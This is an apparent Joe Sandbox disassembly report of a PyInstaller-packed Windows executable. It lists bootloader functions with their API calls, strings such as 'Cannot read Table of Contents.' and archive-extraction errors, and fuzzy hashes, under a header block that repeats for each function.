Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 036bb9af6ac8c728884dbc430cc13962f440282e35d529492d92ee50b2a68dd9
Instruction ID: 9dd62e8b029df7c41570d314538a0743663e91f89d6ca2d83630180d12e8f738
Opcode Fuzzy Hash: 036bb9af6ac8c728884dbc430cc13962f440282e35d529492d92ee50b2a68dd9
Instruction Fuzzy Hash: 1A028E21A0D68341FA55BF26E850279A6B4AFC6BE0FDD4635DD6D4A3D2DF3DE8018320

Function 00007FF7599517B0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fread_nolock.LIBCMT ref: 00007FF75995185C
_fread_nolock.LIBCMT ref: 00007FF75995190E

Part of subcall function 00007FF75995E6D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75995E6E4

Strings

Failed to seek to cookie position!, xrefs: 00007FF75995182F
fseek, xrefs: 00007FF759951836
fread, xrefs: 00007FF75995186E
Error on file., xrefs: 00007FF75995193D
Could not allocate buffer for TOC!, xrefs: 00007FF7599518E3
Failed to read cookie!, xrefs: 00007FF759951867
Could not read full TOC!, xrefs: 00007FF759951919
Cannot read Table of Contents., xrefs: 00007FF759951995
malloc, xrefs: 00007FF7599518EA
MEI, xrefs: 00007FF7599517EF

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _fread_nolock$_invalid_parameter_noinfo
String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
API String ID: 3405171723-4158440160
Opcode ID: 835103007f02c9749ac647d58f048ab1686cef21957037b090b7deb9b795050b
Instruction ID: 7e04b00b44234568771d1c16493688f22dfe73a36bf073d75e4b116391836054
Opcode Fuzzy Hash: 835103007f02c9749ac647d58f048ab1686cef21957037b090b7deb9b795050b
Instruction Fuzzy Hash: 46518471A0960296EB64EF24E55017DB3B0FFC8B48B994535DA0D87399EF3CE440C750

Function 00007FF759951440 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF759951559
fopen, xrefs: 00007FF759951491
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7599514F9
fseek, xrefs: 00007FF759951500
fread, xrefs: 00007FF7599515EC
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7599514CA
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7599515E5
Failed to extract %s: failed to open target file!, xrefs: 00007FF75995148A
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF7599515D5
malloc, xrefs: 00007FF759951560
fwrite, xrefs: 00007FF7599515DC

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID:
String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 0-666925554
Opcode ID: 9960f63575f751e35a3844e99a4979cf69418d4c573dd41fa87a4345e49a5c97
Instruction ID: 6be2009328183c252f27a89130c7bf9debbcfabd34262de06cf4507ee73f494f
Opcode Fuzzy Hash: 9960f63575f751e35a3844e99a4979cf69418d4c573dd41fa87a4345e49a5c97
Instruction Fuzzy Hash: B7519961B09642A1EA20BF21E6506BAE3B0AFC6BD4FCC4531DE1D47696FF3DE5458320

Function 00007FF759956A60 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00007FF7599559BA,?,00007FF7599558AD), ref: 00007FF759956AA0
OpenProcessToken.ADVAPI32(?,00007FF7599558AD), ref: 00007FF759956AB1
GetTokenInformation.KERNELBASE(?,00007FF7599558AD(TokenIntegrityLevel)), ref: 00007FF759956AD3
GetLastError.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF759956ADD
GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel), ref: 00007FF759956B1A
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF759956B2C
CloseHandle.KERNEL32(?,00007FF7599558AD), ref: 00007FF759956B44
LocalFree.KERNEL32(?,00007FF7599558AD), ref: 00007FF759956B76
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF759956B9D
CreateDirectoryW.KERNELBASE(?,00007FF7599558AD), ref: 00007FF759956BAE

Strings

S-1-3-4, xrefs: 00007FF759956B4F
D:(A;;FA;;;%s), xrefs: 00007FF759956B59

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
String ID: D:(A;;FA;;;%s)$S-1-3-4
API String ID: 4998090-2855260032
Opcode ID: 04a4952acd007a2d57849bf4a7f549880b035f2fca275a5dfd27a02a5c87a0f0
Instruction ID: 21b22208a473809b7640de68ab64468cf65092a0c8a88c8a2ed32fb2816d849f
Opcode Fuzzy Hash: 04a4952acd007a2d57849bf4a7f549880b035f2fca275a5dfd27a02a5c87a0f0
Instruction Fuzzy Hash: 2841713161CA8292EB50AF60E4446AAB371FFC6794FC80635EA5E476D5DF3CD449CB20

Function 00007FF759956130 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF759956DB0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?), ref: 00007FF759956DEA

SetConsoleCtrlHandler.KERNEL32(00000000,00007FF759952B60,?,?,?,?,?,?), ref: 00007FF75995617F
GetStartupInfoW.KERNEL32 ref: 00007FF75995619E

Part of subcall function 00007FF7599692E4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7599692F8

Part of subcall function 00007FF75996705C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7599670C3

GetCommandLineW.KERNEL32 ref: 00007FF75995623E
CreateProcessW.KERNELBASE ref: 00007FF759956280
WaitForSingleObject.KERNEL32 ref: 00007FF759956294
GetExitCodeProcess.KERNELBASE ref: 00007FF7599562A4

Strings

Error creating child process!, xrefs: 00007FF7599562B0
CreateProcessW, xrefs: 00007FF7599562B7

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Error creating child process!
API String ID: 2895956056-3524285272
Opcode ID: d5693698e4819ce5d510509d5cda6c943b390b1bcdb6e918232fd1435297541c
Instruction ID: 76a43fd3b02af1a777aa8873d05a5fd4416c0857bc136e57c33af8272207c97e
Opcode Fuzzy Hash: d5693698e4819ce5d510509d5cda6c943b390b1bcdb6e918232fd1435297541c
Instruction Fuzzy Hash: 5A410D31A0878282EA20AF60E4452AAF3B0FFD5360F940735E6AD47BD5DF7CD0488B50

Function 00007FF759951000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 274
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF759952CD0: GetModuleFileNameW.KERNEL32(?,00007FF7599527C9,?,?,?,?,?,?), ref: 00007FF759952D01

SetDllDirectoryW.KERNEL32 ref: 00007FF7599529D5

Part of subcall function 00007FF759955AF0: GetEnvironmentVariableW.KERNEL32(00007FF759952817,?,?,?,?,?,?), ref: 00007FF759955B2A
Part of subcall function 00007FF759955AF0: ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?), ref: 00007FF759955B47

Strings

_PYI_ONEDIR_MODE, xrefs: 00007FF75995282C, 00007FF759952857
_MEIPASS2, xrefs: 00007FF759952803, 00007FF75995286C, 00007FF759952B1B, 00007FF759952B2B
Cannot side-load external archive %s (code %d)!, xrefs: 00007FF75995295C
Cannot open PyInstaller archive from executable (%s) or external archive (%s), xrefs: 00007FF7599528BE
Failed to convert DLL search path!, xrefs: 00007FF7599529BD
MEI, xrefs: 00007FF759952917

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
API String ID: 2344891160-3602715111
Opcode ID: 9cc289c9195a371b6f24d31b42917e49a42ba6d60d8658c917f02b3ce32f2aaf
Instruction ID: dd7068710be220c1abbc3ea07a3d919f340b274f3f28caf2709f595dbbd5e807
Opcode Fuzzy Hash: 9cc289c9195a371b6f24d31b42917e49a42ba6d60d8658c917f02b3ce32f2aaf
Instruction Fuzzy Hash: 27C16021A2C68265FA64BF2195512FFE3B1BFD4784FC85032EA4D4769AEF2CE505C720

Function 00007FF759951050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF759951249
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF7599510B4
1.2.13, xrefs: 00007FF75995107E
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF7599510F1
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF75995111F
malloc, xrefs: 00007FF7599510F8, 00007FF759951126

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID:
String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 0-1655038675
Opcode ID: af04965e2dbcd0d8e1621cd66b39530d0b4f4ad9fcd8e07e4d45104bc70e5302
Instruction ID: ea4f4e5a340953bacaff18066637a777c68a5da6ece31f09c28e573c86133112
Opcode Fuzzy Hash: af04965e2dbcd0d8e1621cd66b39530d0b4f4ad9fcd8e07e4d45104bc70e5302
Instruction Fuzzy Hash: 1F519C22A09682A1EA70BF51E5403BAA2A0BFC5798FCC4135DE4E87795FF3CE545C720

Function 00007FF75996DF30 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,00000000,?,00007FF75996E2CA,?,?,-00000018,00007FF75996A383,?,?,?,00007FF75996A27A,?,?,?,00007FF7599654E2), ref: 00007FF75996E0AC
GetProcAddress.KERNEL32(?,00000000,?,00007FF75996E2CA,?,?,-00000018,00007FF75996A383,?,?,?,00007FF75996A27A,?,?,?,00007FF7599654E2), ref: 00007FF75996E0B8

Strings

ext-ms-, xrefs: 00007FF75996E009
api-ms-, xrefs: 00007FF75996DFF6

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 5d4014bca18f9f9ee9ee76f308e7221266f6712ab36b1d3e30b229e2872ef72f
Instruction ID: 07998a99c4e0b97ae75273e9face9fd3f230911a098c111fbe83e17da6126c37
Opcode Fuzzy Hash: 5d4014bca18f9f9ee9ee76f308e7221266f6712ab36b1d3e30b229e2872ef72f
Instruction Fuzzy Hash: 4F410161B1AA5281FA12AF56D800675A3B1BFC5BA0FCC4539DD1D8B384EF3CE445C324

Function 00007FF75996B08C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75996B4B9

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5e2fa04a27a554ad5a06cbbe01d601b05b68f3aeb2922c25288f770f6f319bba
Instruction ID: 956f924bc8cd71f1dccfd23491324f7b0afe9ca7069b14b4bda2196306e369c2
Opcode Fuzzy Hash: 5e2fa04a27a554ad5a06cbbe01d601b05b68f3aeb2922c25288f770f6f319bba
Instruction Fuzzy Hash: 2AC1BD22A0C6C691E720AF15D4402BEABB9EBC5B80FDD4135DA4E07795EF7DE8498360

Function 00007FF75996C590 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF75996C57B), ref: 00007FF75996C6AC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF75996C57B), ref: 00007FF75996C737

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 1ee269c4fb3492fdab786e16ea0be33da994e1b3a3006f3c14cd8905a42bf150
Instruction ID: 07e63ef3d95689bfaaca90cfc714a77399111b4c0e1fd7e448602c3b125c1626
Opcode Fuzzy Hash: 1ee269c4fb3492fdab786e16ea0be33da994e1b3a3006f3c14cd8905a42bf150
Instruction Fuzzy Hash: C691B532F1869285F760AF65D4402BDABB4BB95B88F984139EF0E57A84EF3CD441C760

Function 00007FF75996E95C Relevance: 6.2, APIs: 4, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF75996EA4C
_get_daylight.LIBCMT ref: 00007FF75996EA5D
_get_daylight.LIBCMT ref: 00007FF75996EA6E
_isindst.LIBCMT ref: 00007FF75996EB39

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 993f4cb53d01987759aa9ab87d439edc94425a62c6450610c4994d1423bcdf7f
Instruction ID: fa32da0952482889541bdf40f283ef24fa5c020d8e8017cd08c98dc715491f14
Opcode Fuzzy Hash: 993f4cb53d01987759aa9ab87d439edc94425a62c6450610c4994d1423bcdf7f
Instruction Fuzzy Hash: C9510372F042928BFB14EFB5D9456BCA7B1ABC0398F9C0139DD1E56AE5DF38A4128710

Function 00007FF7599646E8 Relevance: 6.1, APIs: 4, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF759964715
CreateFileW.KERNELBASE ref: 00007FF759964754
CloseHandle.KERNEL32 ref: 00007FF759964789

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 3d6046d72fa2396df0887b114e3627fe285c38a7a8010f89346fd758d181b2b8
Instruction ID: 95ec346940dc3767e1493005dca74e8fe40ba9d1442f7146d28e4dff3abd19ab
Opcode Fuzzy Hash: 3d6046d72fa2396df0887b114e3627fe285c38a7a8010f89346fd758d181b2b8
Instruction Fuzzy Hash: EE41B062D187C283E710AFA0D510369B371FBD67A4F58A334EA9D03AD5DF6CA4A08720

Function 00007FF75995A51C Relevance: 4.6, APIs: 3, Instructions: 102COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF75995A530

Part of subcall function 00007FF75995A6FC: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF75995A71E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF75995A545
__scrt_release_startup_lock.LIBCMT ref: 00007FF75995A5B3

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 3058843127-0
Opcode ID: 0a8c62a57e2cf59f1561fe537eeb51f2220189f8d74725526a3d26dbeb988a7e
Instruction ID: 596d97b3385904de774f6d0197ec6386e2ce4a59491fa5d8e77f420c4ba02044
Opcode Fuzzy Hash: 0a8c62a57e2cf59f1561fe537eeb51f2220189f8d74725526a3d26dbeb988a7e
Instruction Fuzzy Hash: 56311821E0E14262FA14BF21D5113BAA2F1AFC1784FCC4435EA0D4B297DF2DE845827A

Function 00007FF7599689E8 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7599689E4), ref: 00007FF7599689F9
TerminateProcess.KERNEL32(?,?,?,00007FF7599689E4), ref: 00007FF759968A04
ExitProcess.KERNEL32 ref: 00007FF759968A13

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fc68bfbf785dc4e8d02d30f22ac316467e06faf73d836825e3014864920bd8dd
Instruction ID: 44383caa55dea4aebb1f83e2423ce828fbc50a4e94be81262cc1415ed2fecc7e
Opcode Fuzzy Hash: fc68bfbf785dc4e8d02d30f22ac316467e06faf73d836825e3014864920bd8dd
Instruction Fuzzy Hash: A3D09E10B1968246EA543F719C551B992715FD9756F881438CC4F56393CF3DE44D8261

Function 00007FF75995E6FC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75995E740
_invalid_parameter_noinfo.LIBCMT ref: 00007FF75995E837

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: a3600ff4682811ddeb36fb761298261c2e9791cf1ca8f4758584451e9995ac85
Instruction ID: 4693d371c40f99f0e87e07388762a956681c2d9f0a6e38438a0bdbecb70ea885
Opcode Fuzzy Hash: a3600ff4682811ddeb36fb761298261c2e9791cf1ca8f4758584451e9995ac85
Instruction Fuzzy Hash: F451E661B0968176FB78BEA5940067BA2A5BFC4BA4F9C4638DE7C077D9CF3DD4018620

Function 00007FF75996BA48 Relevance: 3.1, APIs: 2, Instructions: 71COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF75996BAC1
GetFileType.KERNELBASE ref: 00007FF75996BAD7

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
